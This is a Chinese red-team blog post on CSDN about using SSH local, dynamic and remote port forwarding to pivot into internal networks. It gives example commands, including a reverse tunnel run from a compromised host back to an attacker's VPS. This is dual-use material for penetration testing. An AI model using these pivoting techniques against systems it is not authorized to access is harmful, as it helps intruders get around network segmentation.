红队笔记之SSH隧道在内网穿透中的应用

最新推荐文章于 2023-06-04 10:56:49 发布
最新推荐文章于 2023-06-04 10:56:49 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: 红队笔记 文章标签: 渗透测试 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CoreNote/article/details/123640334
版权

在这里插入图片描述

基于SSH的本地端口转发

工具简介:

SSH(Secure Shell Protocol)是一种网络协议,用于计算机之间的加密登录。通常情况下Linux主机会安装ssh用来支持远程链接,ssh可以进行身份验证,scp,sftp和端口转发等功能,此处我们主要针对端口转发进行说明。

适用场景:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-F6UimQGp-1647853375956)(E:\CoreNote\文章附件\1638866146137.png)]

1、攻击者准备访问靶标主机B但是因为网络因为无法直接访问B

2、攻击者具有访问主机A的SSH服务权限(虽然是废话但是此处为整个利用过程的前提)

3、主机A可以访问到靶标主机B

利用原理:

将主机A作为攻击机与靶标主机B的流量跳板。攻击机的流量先到到主机A再由主机A转发至靶标主机B

使用方法:

命令:-L localport:remotehost:remotehostport sshserver
说明:
	localport       本机开启的端口号
    remotehost      最终连接机器的IP地址
    remotehostport      最终连接机器的端口号
    sshserver       转发机器的IP地址
参数:
	-f 后台启用
    -N 不打开远程shell,处于等待状态(不加-N则直接登录进去)
    -g 启用网关功能
    -L 本地转发模式

示例

#在攻击者的主机中执行:ssh -L 攻击机绑定端口2222:靶机ip:靶机端口 -fN 跳板机地址
ssh -L 2222:192.168.84.128:80 -fN 192.168.84.129
# 因为将靶机的web服务80端口转发到了本机的2222端口,此处用curl测试是否可以成功访问
curl http://127.0.0.1:2222
# 如想中断转发可以执行kill
killall ssh

在这里插入图片描述

基于SSH的动态端口转发

适用场景:

在这里插入图片描述

1、攻击者准备访问靶标主机B但是因为网络因为无法直接访问B

2、攻击者具有访问主机A的SSH服务权限(和本地转发一样)

3、主机A也有能被攻击机访问到的ip与端口(因为它会作为代理服务器被攻击者访问)

4、主机A可以访问到靶标主机B

利用原理:

将主机A作为代理服务器,动态转发攻击机与靶标主机B的流量

使用方法:

命令:-D sshserverport -CfNg sshserver
说明:
	sshserverport        本地端口
	remotehost          最终连接机器的IP地址
	remotehostport        被转发机器的端口号
	sshserver             被转发机器的IP地址
参数:
	-f 后台启用
    -N 不打开远程shell,处于等待状态(不加-N则直接登录进去)
    -g 启用网关功能
    -L 本地转发模式
    -C 请求压缩所有数据

# 1、在主机A中执行:ssh -D A的本地端口(外部可以访问的端口) -CfNg 主机A的ip(以Socks协议启动代理)
ssh -D 2222 -CfNg 192.168.84.129
# 2、配置Socks代理
# 3、访问靶机站点
# 4、如想中断转发可以执行kill
killall ssh

配置代理(为了方便此处使用火狐配置浏览器代理,也可使用其他全局代理工具)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-P5TktDfA-1647853375959)(E:\CoreNote\文章附件\1638970271004.png)]

在浏览器上访问目标站点

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3VTpdJjZ-1647853375959)(E:\CoreNote\文章附件\1638970123680.png)]

基于SSH的远程端口转发

适用场景:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-movwcb2b-1647853375959)(E:\CoreNote\文章附件\1638965480424.png)]

1、攻击者准备访问靶标主机B但是因为网络因为无法直接访问B

2、攻击者无法访问A的SHH服务(注意这里无法直接访问A,可能只有一个webshell)

3、A可以访问靶标B,且A可以访问攻击者

利用原理:

使用A反向连接攻击机,从而完成攻击者与靶标流量的转发

使用方法:

命令:-R sshserverport:remotehost:remotehostport sshserver
说明:
	sshserverport         被转发机器开启的端口号
	remotehost          最终连接机器的IP地址
	remotehostport        被转发机器的端口号
	sshserver             被转发机器的IP地址
参数:
	-f 后台启用
    -N 不打开远程shell,处于等待状态(不加-N则直接登录进去)
    -g 启用网关功能
    -L 本地转发模式

实例

#在主机A中执行:ssh -R 攻击机绑定端口2222:靶机ip:靶机端口 -fN 攻击机的ip(vps)
ssh -R 2222:192.168.84.128:80 -fN 106.12.109.xxx
# 因为将靶机的web服务80端口转发到了攻击机的2222端口,在vps上用curl测试是否可以成功访问
curl http://127.0.0.1:2222
# 如想中断转发可以执行kill
killall ssh

在这里插入图片描述
在这里插入图片描述

如果执行过程中出现Warning: remote port forwarding failed for listen port,可以在主机中执行killall ssh

方寸明光
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
基于SSH隧道的简单内网穿透
Vega870092839的博客
01-26 2511
通过SSH隧道实现简单的内网穿透
SSH隧道内网穿透
爱吃回锅肉的胖子
04-26 3164
SSH参数解释 -L port:host:hostPort 解释:将本地机器某个端口转发到远端指定机器的指定端口 原理:本地机器分配了一个socket监听port端口,一旦端口上有了连接,该连接就经过安全通道转发出去,同时远程主机和host的hostPort端口建立连接。可以在配置文件指定端口的转发。只有root才能转发特权端口。 -R port:host:hostPort 解释:将远程主机的某个端口转发到本地端指定机器的指定端口。即反向隧道代理 原理:远程主机上分配了一个socket监听p
ssh方向代理 Warning: remote port forwarding failed for listen port问题
紫枫洛天的博客
08-24 7140
本地服务器上报错 原因是这个端口被占用了, 或者是之前的连接还没断开, 这个时候就去远程服务器上kill掉这个程序就可以了, 注意一定要是root账号
linux SSH反向代理, 远程服务器登录本地服务器
紫枫洛天的博客
08-24 1376
1 前言 本地电脑远程不能访问, 比如公司内网的服务器, 或者网关 ,这些都没有公网IP, 可以使用SSH隧道代理来访问 2 具体操作 准备2台电脑, A电脑内网: ssh账号密码: root : 123456 B电脑公网: ssh账号密码: root: 123456 IP:123.123.123.123 1 本地电脑A上操作: ssh -fCNR 7281:localhost:22 root@123.123.123.123 然后会让输入远程服务器密码, 输...
autossh实现内网穿透,通过外网服务器端口转内网上虚拟机服务器
热门推荐
诗水人间
07-03 13万+
第一步、登陆外网服务器,开放外网服务器端口 修改ssh配置文件 vim /etc/ssh/sshd_config 将GatewayPorts no注释取消,并且修改为yes GatewayPorts yes 重启sshd服务 systemctl restart sshd 在阿里防火墙规则添加一个端口 第二步、登陆内网服务器 安装autossh centos服务器请使用yum安装,最好先yum update更新一下软件包索引缓存 yum install autossh -y ubuntu服务器
红队笔记:技巧,窍门和技巧的串联
02-25
红队笔记 提示,技巧和技巧的串联。 当前主题:文件传输
红队备忘单:这是为了重新整理我的笔记
02-09
红队备忘单
红队必备技能之隐蔽的技巧1
08-03
5.1 添加仓库 5.2 安装Certbot的Nginx软件包 5.3 验证配置是否正确 5.5 获取证书 5.6 自动续订
红队攻防手册,红队攻防教程
最新发布
04-20
红队攻防教程是指针对网络和系统安全的实践性培训,旨在模拟真实的攻击场景并提供相关的防御技术。红队是一个模拟攻击团队,通过模拟真实的黑客攻击来测试组织的安全性,而蓝队则是负责防御和应对这些攻击的团队。 ...
实战攻防之红队视角下的防御体系突破.docx
08-23
实战攻防之红队视角下的防御体系突破
配置ssh隧道访问内网服务
贾文超的博客
08-23 2082
ssh隧道跳转内部服务
内网学习笔记 | SSH 隧道使用
Appleteachers的博客
06-07 740
前言 SSH 全称Secure Shell,从它的名字来看这个协议就比较安全SSH 协议是一种应用层协议,支持几乎所有 UNIX、Linux 平台。 得益于 SSH 协议在传输过程都是加密,所以在流量层面也较难区分合法的 SSH 流量和攻击者产生的 SSH 流量。 因此在内网渗透过程,使用 SSH 协议进行建立隧道的方法,一方面不用自己再上传同类工具,另一方面降低了因上传使用了同类工具被管理员发现的风险。 一、SSH 常用命令介绍 相信各位平时最常使用的 SSH 命令就是拿来连接 Lin..
mysql ssh隧道连接内网mysql
gitxuzan
06-04 2778
ssh隧道连接mysql
SSH本地转发和远程转发
misea的专栏
12-08 1246
本地转发和远程转发 ssh 端口转发需要 sshd 服务器配置 /etc/ssh/sshd_config tcp转发选项为开启: AllowTcpForwarding yes 1 本地转发 ssh -L <local port>:<remote host>:<remote port> <SSH hostname> 本地转发在本地这台机器上监听一个端口,然后所有访问这个端口的数据都会通过ssh 隧道传输到远端的对应端口上 应用场景,例如:
反向ssh登陆内网服务器
victeer的博客
12-27 2409
参考文献: https://www.cnblogs.com/zhongbin/p/3940956.html   A要控制B A主机:外网,ip:123.123.123.123,sshd端口:22 B主机:内网,sshd端口:22 无论是外网主机A,还是内网主机B都需要跑ssh daemon 执行第一个命令 ssh -NfR 1234:localhost:22 user1@123.12...
SSH的端口转发:本地转发Local Forward和远程转发Remote Forward
xyyangkun的专栏
11-30 4万+
http://zhumeng8337797.blog.163.com/blog/static/100768914201172125444948/ 实战 SSH 端口转发 https://www.ibm.com/developerworks/cn/linux/l-cn-sshforward/ SSH的端口转发:本地转发Local Forward和远程转发Remote For
ssh隧道及转发技术应用场景三例
weixin_34342992的博客
11-02 272
ssh隧道技术在实际环境时不时都会用到,最近一段时间以下三种方式都有用到过。原因就是各现场网络环境的多种多样,下面分别介绍三种应用场景。有可以通过ssh命令来实现,也可以通过SSH工具来实现,本文采用secureCRT工具来实现,仅以此做一下记录与整理,通常一些小的技能解决大问题。本文连接:http://koumm.blog.51cto.com场景一:说明:一个互联网用户需...
SSH Tunnel扫盲(ssh port forwarding端口转发)
blade2001的专栏
05-02 4万+
SSH的的Port Forward,文可以称为端口转发,是SSH的一项非常重要的功能。它可以建立一条安全SSH通道,并把任意的TCP连接放到这条通道。下面仔细就仔细讨论SSH的这种非常有用的功能。 SSH Tunnel有三种,分别是本地Local(ssh -NfL),远程Remotessh -NfR),动态Dynamic(ssh -NfD)。(含义参考man ssh
SSH Port Forwarding
06-24 2829
  Introduction SSH is typically used for logging into remote servers so you have shell access to do maintenance, read your email, restart serv
Red Team Operations - Overview PT.2.pdf
10-06
"Red Team Operations - Overview PT.2.pdf"是一本关于红队技术的概览性书籍,其提供了一些基于其他书籍和课程的材料。作者Joas Antonio的领英个人主页为https://www.linkedin.com/in/joas-antonio-dos-santos/。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

方寸明光

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值